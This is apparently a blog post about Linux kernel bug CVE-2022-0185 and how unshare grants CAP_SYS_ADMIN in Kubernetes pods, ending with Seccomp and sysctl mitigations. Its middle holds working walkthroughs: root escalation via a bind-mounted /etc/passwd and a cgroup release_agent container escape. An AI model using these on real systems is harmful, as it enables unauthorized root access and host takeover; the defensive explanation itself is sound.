Author: Michelangelo, KubeSphere evangelist and cloud native addict
On January 18, 2022, Linux maintainers and vendors disclosed a heap buffer overflow vulnerability, CVE-2022-0185, in the legacy_parse_param function of the Linux kernel's filesystem context code (5.1-rc1 and later). It is a high-risk vulnerability with a severity score of 7.8.
The vulnerability allows out-of-bounds writes in kernel memory. Exploiting this vulnerability, an unprivileged attacker can bypass any Linux namespace restrictions and escalate their privileges to root. For example, if an attacker infiltrates your container, they can escape from the container and escalate privileges.
The vulnerability was introduced in Linux kernel 5.1-rc1 in March 2019. A patch released on January 18 fixes the problem, and all Linux users are advised to download and install the latest kernel version.
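As a rough first filter, the kernel release string can be compared against the version in which the bug was introduced. The sketch below is only that: the helper names are made up for illustration, and because distributions backport fixes without changing the major.minor version, a True result means "check your vendor advisory", not "vulnerable".

```python
import re
from typing import Tuple

# Per the article, the bug was introduced in 5.1-rc1.
FIRST_AFFECTED = (5, 1)


def parse_release(release: str) -> Tuple[int, int]:
    """Extract (major, minor) from a release string such as '5.4.0-96-generic'."""
    match = re.match(r"(\d+)\.(\d+)", release)
    if match is None:
        raise ValueError(f"unrecognized kernel release: {release!r}")
    return int(match.group(1)), int(match.group(2))


def possibly_affected(release: str) -> bool:
    """True if the kernel is at least 5.1, i.e. new enough to contain the bug.

    This cannot tell whether a vendor has already backported the fix.
    """
    return parse_release(release) >= FIRST_AFFECTED
```

On a live system the input would typically come from platform.release() in the Python standard library.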
Vulnerability Details
The vulnerability is caused by an integer underflow in the legacy_parse_param function of the filesystem context code (fs/fs_context.c). The filesystem context is used to create the superblock when mounting and remounting a filesystem. The superblock records the characteristics of a filesystem, such as block size, file size, and its storage blocks.
By sending more than 4095 bytes of input to the legacy_parse_param function, the input length detection can be bypassed, resulting in an out-of-bounds write, triggering the vulnerability. An attacker could exploit this vulnerability to write malicious code to other parts of memory, crash the system, or execute arbitrary code to escalate privileges.
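To make the underflow concrete, here is a minimal Python sketch that models the length check with unsigned 64-bit arithmetic. The shape of the check (len > PAGE_SIZE - 2 - size) follows public write-ups of the bug and is an assumption here, not a quote from the kernel source; the function and variable names are made up for illustration.

```python
PAGE_SIZE = 4096
MASK64 = (1 << 64) - 1  # emulate unsigned 64-bit wraparound


def check_rejects(size: int, length: int) -> bool:
    """Model of an unsigned bounds check of the form: len > PAGE_SIZE - 2 - size.

    size   -- bytes already accumulated in the legacy options buffer
    length -- bytes the new parameter would add
    Returns True when the check would reject the input.
    """
    limit = (PAGE_SIZE - 2 - size) & MASK64
    return length > limit


# Normal case: the buffer is nearly full, so a large parameter is rejected.
print(check_rejects(4000, 200))

# Underflow case: once size reaches 4095, PAGE_SIZE - 2 - size is -1, which
# wraps to 2**64 - 1 as an unsigned value, so nothing is ever rejected.
print(check_rejects(4095, 200))
```

The second call is the interesting one: the subtraction goes below zero, the unsigned limit becomes enormous, and every subsequent write is accepted even though the buffer is already full.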
The input data for legacy_parse_param is supplied via the fsconfig system call, which configures the creation context of a filesystem (such as the superblock of an ext4 filesystem).
// Use the fsconfig system call to add the NUL-terminated string pointed to by val
fsconfig(fd, FSCONFIG_SET_STRING, "\x00", val, 0);
To use the fsconfig system call, an unprivileged user must have at least the CAP_SYS_ADMIN capability in their current namespace. This means that if a user can enter another namespace in which they hold this capability, that is enough to exploit the vulnerability.
If an unprivileged user does not have CAP_SYS_ADMIN, they can obtain it through the unshare(CLONE_NEWNS|CLONE_NEWUSER) system call. The unshare system call lets a user create new namespaces (here a user namespace and a mount namespace) in which they hold the capabilities needed for further attacks. This technique matters a great deal in the Kubernetes and container world, where Linux namespaces are used to isolate Pods, and attackers can fully exploit it in a container escape attack. Once successful, an attacker gains full control over the host OS and all containers on it, can go on to attack other machines on the internal network, and can even deploy malicious containers in the Kubernetes cluster.
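Whether a given environment allows this unshare call can be probed directly. The following is a minimal sketch, assuming a Linux host with glibc; the function name is hypothetical, and the call is made in a forked child so that the calling process keeps its own namespaces.

```python
import ctypes
import os

# Flag values from <linux/sched.h>
CLONE_NEWNS = 0x00020000
CLONE_NEWUSER = 0x10000000


def unshare_allowed() -> bool:
    """Return True if unshare(CLONE_NEWUSER | CLONE_NEWNS) succeeds in a child."""
    pid = os.fork()
    if pid == 0:
        # Child process: attempt the call and report the result via exit code.
        try:
            libc = ctypes.CDLL(None, use_errno=True)
            rc = libc.unshare(CLONE_NEWUSER | CLONE_NEWNS)
            os._exit(0 if rc == 0 else 1)
        except Exception:
            os._exit(2)
    _, status = os.waitpid(pid, 0)
    return os.WIFEXITED(status) and os.WEXITSTATUS(status) == 0
```

A False result suggests that a Seccomp filter or a host-level setting is blocking user namespace creation; True means the path described above is open.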
The research team that discovered the vulnerability published the code and proof of concept exploiting the vulnerability on GitHub on January 25.
PoC
Docker and other container runtimes use the Seccomp profile by default to prevent processes in the container from using dangerous system calls to protect Linux namespace boundaries.
Seccomp (short for secure computing mode) was introduced into the Linux kernel in version 2.6.12 (March 8, 2005). In its original form it restricts a process to four system calls: read, write, _exit, and sigreturn. This is a whitelist model: the process may only use those four calls on file descriptors that are already open, and if it attempts any other system call, the kernel terminates it with SIGKILL or SIGSYS.
However, Kubernetes by default does not apply any Seccomp or AppArmor/SELinux profile to restrict the system calls of Pods, which is very dangerous. Processes in Pods can freely invoke dangerous system calls and obtain the privileges they need (such as CAP_SYS_ADMIN) for further attacks.
Let's start with a Docker example. In a standard Docker environment, the unshare command is not available. Docker's Seccomp filter blocks the system call used by this command.
$ docker run --rm -it alpine /bin/sh
/ # unshare
unshare: unshare(0x0): Operation not permitted
Now let's take a look at a Kubernetes Pod:
$ kubectl run --rm -it test --image=ubuntu /bin/bash
If you don't see a command prompt, try pressing enter.
root@test:/# lsns | grep user
4026531837 user 3 1 root /bin/bash
root@test:/#
root@test:/# apt update && apt install -y libcap2 libcap-ng-utils
root@test:/# ......
root@test:/# pscap -a
ppid pid name command capabilities
0 1 root bash chown, dac_override, fowner, fsetid, kill, setgid, setuid, setpcap, net_bind_service, net_raw, sys_chroot, mknod, audit_write, setfcap
It can be seen that the root user in the Pod does not have the CAP_SYS_ADMIN capability, but we can obtain the CAP_SYS_ADMIN capability through the unshare command.
root@test:/# unshare -Urm
#
# pscap -a
ppid pid name command capabilities
0 1 root bash chown, dac_override, fowner, fsetid, kill, setgid, setuid, setpcap, net_bind_service, net_raw, sys_chroot, mknod, audit_write, setfcap
1 265 root sh full
# lsns | grep user
4026532695 user 3 265 root -sh
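The same information that pscap prints can be read from the CapEff line of /proc/<pid>/status, where capabilities are encoded as a hexadecimal bitmask and CAP_SYS_ADMIN is bit 21. The sketch below decodes that mask; the helper names are made up for illustration, and the two sample masks are illustrative values (the first encodes the 14 capabilities listed in the pscap output above).

```python
CAP_SYS_ADMIN = 21  # bit index from <linux/capability.h>


def effective_caps(status_text: str) -> str:
    """Return the hex CapEff mask from the text of a /proc/<pid>/status file."""
    for line in status_text.splitlines():
        if line.startswith("CapEff:"):
            return line.split()[1]
    raise ValueError("no CapEff line found")


def has_capability(cap_mask_hex: str, cap_bit: int = CAP_SYS_ADMIN) -> bool:
    """True if the given capability bit is set in the hex mask."""
    return bool((int(cap_mask_hex, 16) >> cap_bit) & 1)


# Default container capability set: CAP_SYS_ADMIN is absent.
print(has_capability("00000000a80425fb"))

# A full capability set, as seen inside the new user namespace.
print(has_capability("000001ffffffffff"))
```

To inspect the current process, pass the contents of /proc/self/status to effective_caps and feed the result to has_capability.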
So what can you do with CAP_SYS_ADMIN? Here are two examples showing how CAP_SYS_ADMIN can be used to compromise a system.
Escalate an ordinary user to root!
The following steps escalate an ordinary user on the host directly to root.
First, grant python3 the CAP_SYS_ADMIN capability (note that setcap cannot operate on symbolic links, only on the real file).
$ which python3
/usr/bin/python3
$ ll /usr/bin/python3
lrwxrwxrwx 1 root root 9 Mar 13 2020 /usr/bin/python3 -> python3.8*
$ setcap CAP_SYS_ADMIN+ep /usr/bin/python3.8
$ getcap /usr/bin/python3.8
/usr/bin/python3.8 = cap_sys_admin+ep
Create a regular user.
$ useradd test -d /home/test -m
Then switch to the normal user and enter the user's home directory.
$ su test
$ cd ~
Copy /etc/passwd to the current directory and change the root user's password to "password".
$ cp /etc/passwd ./
$ openssl passwd -1 -salt abc password
$1$abc$BXBqpb9BZcZhXLgbee.0s/
# Change root:x on the first line to root:$1$abc$BXBqpb9BZcZhXLgbee.0s/
$ head -2 passwd
root:$1$abc$BXBqpb9BZcZhXLgbee.0s/:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
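The manual edit of the first line can also be expressed in a few lines of Python. This is a minimal sketch that operates on the text of the copied file only; the function name is hypothetical, and the hash is the one produced by the openssl command above.

```python
def set_root_hash(passwd_text: str, password_hash: str) -> str:
    """Replace the password field (second field) of the root entry."""
    updated = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if fields[0] == "root" and len(fields) >= 2:
            fields[1] = password_hash
        updated.append(":".join(fields))
    return "\n".join(updated) + "\n"


original = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
)
print(set_root_hash(original, "$1$abc$BXBqpb9BZcZhXLgbee.0s/"), end="")
```

Only the root line changes; every other entry is passed through untouched, which matches the head -2 output shown above.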
Bind-mount the modified passwd file over /etc/passwd.
# cat mount-passwd.py
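import ctypes
import os
# use_errno=True lets us read errno after a failed libc call
libc = ctypes.CDLL("libc.so.6", use_errno=True)
libc.mount.argtypes = (ctypes.c_char_p, ctypes.c_char_p, ctypes.c_char_p, ctypes.c_ulong, ctypes.c_char_p)
libc.mount.restype = ctypes.c_int
MS_BIND = 4096  # bind-mount flag from <sys/mount.h>
source = b"/home/test/passwd"
target = b"/etc/passwd"
filesystemtype = b"none"
options = b"rw"
mountflags = MS_BIND
# Bind-mount the modified copy over /etc/passwd and fail loudly on error
if libc.mount(source, target, filesystemtype, mountflags, options) != 0:
    err = ctypes.get_errno()
    raise OSError(err, os.strerror(err))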
$ python3 mount-passwd.py
Now for the moment of truth! Switch directly to the root user and enter the password "password".
$ su root
Password:
root@coredns:/home/test#
Amazing, we have switched to the root user...
Let's see if we really have root privileges:
$ find / -name "*flag*" 2>/dev/null
/sys/kernel/tracing/events/power/pm_qos_update_flags
/sys/kernel/debug/tracing/events/power/pm_qos_update_flags
/sys/kernel/debug/block/vdb/hctx0/flags
/sys/kernel/debug/block/vda/hctx0/flags
/sys/kernel/debug/block/loop7/hctx0/flags
/sys/kernel/debug/block/loop6/hctx0/flags
/sys/kernel/debug/block/loop5/hctx0/flags
/sys/kernel/debug/block/loop4/hctx0/flags
/sys/kernel/debug/block/loop3/hctx0/flags
/sys/kernel/debug/block/loop2/hctx0/flags
/sys/kernel/debug/block/loop1/hctx0/flags
/sys/kernel/debug/block/loop0/hctx0/flags
....
$ cat /sys/kernel/debug/block/vdb/hctx0/flags
alloc_policy=FIFO SHOULD_MERGE
Yes, we really are root.
Finally, remember to unmount /etc/passwd.
$ umount /etc/passwd
So, system reboot engineers, go and check right now whether the ordinary users you have handed out to others can get hold of the CAP_SYS_ADMIN capability!
View all host processes from inside a container!
Now let's look at a container example. The following steps let you list, from inside the container, all the processes running on the host.
We don't need the --privileged parameter to run a privileged container; that would be boring.
$ docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash
Next, run the following commands in the container. The net effect is to execute ps aux on the host and save its output to the /output file in the container.
# Mount the RDMA cgroup controller and create a child cgroup
# This technique should work with the majority of cgroup controllers
# If you're following along and get "mount: /tmp/cgrp: special device cgroup does not exist",
# it's because your setup doesn't have the RDMA cgroup controller; try changing rdma to memory to fix it
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
# Finds path of OverlayFS mount for container
# Unless the configuration explicitly exposes the mount point of the host filesystem
# see https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
# Sets release_agent to /path/payload
echo "$host_path/cmd" > /tmp/cgrp/release_agent
# Creates a payload
echo '#!/bin/sh' > /cmd
echo "ps aux > $host_path/output" >> /cmd
chmod a+x /cmd
# Executes the attack by spawning a process that immediately ends inside the "x" child cgroup
# By creating a /bin/sh process and writing its PID to the cgroup.procs file in "x" child cgroup directory
# The script on the host will execute after /bin/sh exits
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
# Reads the output
cat /output
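The sed expression in the script pulls the OverlayFS upperdir path out of /etc/mtab. A rough Python equivalent is sketched below to show what that step extracts; the function name and the sample mount line (including its directory names) are hypothetical.

```python
import re
from typing import Optional


def overlay_upperdir(mtab_text: str) -> Optional[str]:
    """Return the first upperdir= path found in mtab-style text, if any."""
    for line in mtab_text.splitlines():
        match = re.search(r"upperdir=([^,\s]*)", line)
        if match:
            return match.group(1)
    return None


# Hypothetical overlay entry; real paths differ per container.
sample = (
    "overlay / overlay rw,relatime,"
    "lowerdir=/var/lib/docker/overlay2/l/AAA,"
    "upperdir=/var/lib/docker/overlay2/abc123/diff,"
    "workdir=/var/lib/docker/overlay2/abc123/work 0 0\n"
)
print(overlay_upperdir(sample))
```

The extracted path is where the container's root filesystem lives on the host, which is why the script can tell the host where to find /cmd and where to write /output.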
In the end, you can see all the processes running on the host from inside the container:
root@0c84f7587629:/# cat /output
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.3 172704 13148 ? Ss 2021 131:32 /sbin/init nopti
root 2 0.0 0.0 0 0 ? S 2021 0:18 [kthreadd]
root 3 0.0 0.0 0 0 ? I< 2021 0:00 [rcu_gp]
root 4 0.0 0.0 0 0 ? I< 2021 0:00 [rcu_par_gp]
root 6 0.0 0.0 0 0 ? I< 2021 0:00 [kworker/0:0H-kblockd]
root 8 0.0 0.0 0 0 ? I< 2021 0:00 [mm_percpu_wq]
root 9 0.0 0.0 0 0 ? S 2021 18:36 [ksoftirqd/0]
root 10 0.0 0.0 0 0 ? I 2021 262:22 [rcu_sched]
root 11 0.0 0.0 0 0 ? S 2021 3:06 [migration/0]
root 12 0.0 0.0 0 0 ? S 2021 0:00 [idle_inject/0]
root 14 0.0 0.0 0 0 ? S 2021 0:00 [cpuhp/0]
root 15 0.0 0.0 0 0 ? S 2021 0:00 [cpuhp/1]
......
I will not explain what each of these commands does; interested readers can study them on their own.
What is certain is that the CAP_SYS_ADMIN capability opens up more possibilities for attackers, whether on the host or in a container, and especially in container environments. If we cannot upgrade the kernel for reasons beyond our control, we must look for other solutions.
Solutions
Container level
Since v1.22, Kubernetes can use SecurityContext to add default Seccomp or AppArmor profiles to resource objects, securing Pods, Deployments, StatefulSets, DaemonSets, and more. Although this feature is still in Alpha, users can already supply their own Seccomp or AppArmor profile and reference it in the SecurityContext. For example:
# pod-test.yaml
apiVersion: v1
kind: Pod
metadata:
  name: protected
spec:
  containers:
    - name: protected
      image: ubuntu
      command:
        - sleep
        - infinity
      securityContext:
        seccompProfile:
          type: RuntimeDefault
After creating the Pod, try to use unshare to get the CAP_SYS_ADMIN capability.
$ kubectl exec -it protected -- bash
root@protected:/#
root@protected:/# unshare -Urm
unshare: unshare failed: Operation not permitted
The output shows that the unshare system call is successfully blocked, making it impossible for an attacker to exploit this capability.
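To audit manifests for this setting, a small check can be run over the parsed YAML. The sketch below works on a plain dictionary (for example, the result of loading pod-test.yaml with a YAML parser) and only recognizes the RuntimeDefault profile type; the function names are made up for illustration, and a cluster that relies on custom Localhost profiles would need a different rule.

```python
from typing import Optional


def _profile_type(security_context: Optional[dict]) -> Optional[str]:
    """Return seccompProfile.type from a securityContext mapping, if present."""
    if not security_context:
        return None
    return (security_context.get("seccompProfile") or {}).get("type")


def uses_runtime_default_seccomp(pod: dict) -> bool:
    """True if every container in the Pod ends up with RuntimeDefault.

    A container-level securityContext takes precedence over the Pod-level one.
    """
    spec = pod.get("spec", {})
    pod_level = _profile_type(spec.get("securityContext"))
    containers = spec.get("containers", [])
    if not containers:
        return False
    for container in containers:
        effective = _profile_type(container.get("securityContext")) or pod_level
        if effective != "RuntimeDefault":
            return False
    return True


protected = {
    "spec": {
        "containers": [
            {
                "name": "protected",
                "image": "ubuntu",
                "securityContext": {"seccompProfile": {"type": "RuntimeDefault"}},
            }
        ]
    }
}
print(uses_runtime_default_seccomp(protected))
```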
Host level
Another solution is to disable unprivileged use of user namespaces at the host level, which does not require a reboot. On Ubuntu, for example, running the following two commands takes effect immediately, and the setting also persists across reboots.
$ echo "kernel.unprivileged_userns_clone=0" > /etc/sysctl.d/userns.conf
$ sysctl -p /etc/sysctl.d/userns.conf
On Red Hat systems, run the following commands to achieve the same effect.
$ echo "user.max_user_namespaces=0" > /etc/sysctl.d/userns.conf
$ sysctl -p /etc/sysctl.d/userns.conf
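After applying either setting, the live values can be read back from /proc/sys to confirm that they took effect. The following is a minimal sketch; the helper names are hypothetical, and it simply treats either of the two sysctls above being set to 0 as "disabled".

```python
from pathlib import Path
from typing import Optional

# The two sysctls used above, with the value that disables user namespaces.
USERNS_SYSCTLS = {
    "kernel.unprivileged_userns_clone": "0",
    "user.max_user_namespaces": "0",
}


def read_sysctl(name: str, proc_sys: Path = Path("/proc/sys")) -> Optional[str]:
    """Read a sysctl value from /proc/sys, or None if it does not exist."""
    path = proc_sys / name.replace(".", "/")
    try:
        return path.read_text().strip()
    except OSError:
        return None


def userns_disabled(proc_sys: Path = Path("/proc/sys")) -> bool:
    """True if either sysctl is present and set to its disabling value."""
    return any(
        read_sysctl(name, proc_sys) == value
        for name, value in USERNS_SYSCTLS.items()
    )
```

Calling userns_disabled() with no arguments checks the running host; the proc_sys parameter exists only so the check can be pointed at a test directory.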
To summarize, the recommendations for dealing with this vulnerability are:
- If your environment can tolerate patching the kernel and rebooting the system, it is best to patch or upgrade the kernel.
- Reduce the use of privileged containers that have access to CAP_SYS_ADMIN.
- For unprivileged containers, make sure a Seccomp filter blocks their calls to unshare to reduce risk. Docker is fine by default; Kubernetes needs extra action.
- In the future, Seccomp profiles can be enabled for all workloads in a Kubernetes cluster. At present, this feature is still in the Alpha stage and needs to be turned on through a feature gate.
- Disable the ability for users to use user namespaces at the host level.
Final thoughts
The container environment is complex, especially for a distributed scheduling platform like Kubernetes. Each link has its own life cycle and attack surface, which easily exposes security risks. Container cluster administrators must pay attention to the security issues in every detail. In general, the security of containers in most cases depends on the security of the Linux kernel, so we need to keep an eye on any security issues and implement corresponding solutions as soon as possible.